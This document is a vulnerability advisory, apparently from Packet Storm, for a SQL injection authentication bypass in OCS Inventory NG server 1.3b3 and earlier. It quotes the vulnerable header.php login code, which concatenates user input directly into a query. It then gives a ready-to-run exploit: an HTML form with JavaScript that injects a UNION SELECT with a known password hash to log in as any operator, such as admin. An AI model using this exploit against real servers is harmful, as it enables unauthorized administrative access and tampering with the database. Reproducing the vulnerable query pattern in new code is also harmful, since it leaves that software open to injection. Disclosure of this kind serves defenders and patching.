OCS Inventory NG server versions 1.3b3 and below suffer from a remote authentication bypass vulnerability.
f71175ab1b0ee95ff7fe87301de9b98f2c7b80c8b50d209148dddfacf0aa2489OCS Inventory NG Server <= 1.3b3 (login) Remote Authentication Bypass
Software : Open Computer and Software (OCS) Inventory NG
Download : http://www.ocsinventory-ng.org/
Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
Version : 1.03-beta3 and prior
Impact : Critical
Remote : Yes (No authentication is needed)
== Description ==
Open Computer and Software (OCS) Inventory Next Generation (NG) is an
application designed to help a network or system administrator keep track
of the computers configuration and software that are installed on the network.
The vulnerability is a sql injection which exists in header.php file.
Attacker could pass a special sql string which can used to create/modify
information stored in the database or authenticated in any user.
script : header.php
102 if(isset($_POST["login"])) {
103 $req="SELECT id, accesslvl, passwd FROM operators WHERE
id='".$_POST["login"]."'";
104 $res=mysql_query($req,$_SESSION["readServer"]) or die(mysql_error());
105
106 if($row=@mysql_fetch_object($res))
107 {
108 // DL 25/08/2005
109 // Support new MD5 encrypted password or old clear password
for login only
110 if (($row->passwd != md5( $_POST["pass"])) and
111 ($row->passwd != $_POST["pass"])) {
== Exploit ==
<script>
function inject()
{
document.getElementById('log').action =
document.getElementById('ocsreports').value + 'index.php';
sql = "0' UNION SELECT id, accesslvl,
'a181b4673216ad247a0f78066a9646e1' FROM operators WHERE id='"
document.getElementById('login').value = sql +
document.getElementById('user').value;
document.getElementById('pass').value = "inject";
}
</script>
<form name="log" id="log" action="" method="post">
<table border="0" width="450px">
<tr>
<td><b>OCSReports :</b></td>
<td><input type="text" id="ocsreports" size="40"
value="http://127.0.0.1/ocsreports/" /></td>
</tr>
<tr>
<td><b>Login :</b></td>
<td><input type="text" id="user" size="40" value="admin" /></td>
</tr>
<tr>
<td><input type="hidden" name="login" id="login" />
<input type="hidden" name="pass" id="pass" /></td>
<td><input type="submit" name="subLogin" onclick="inject();"></td>
</tr>
</table>
</form>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed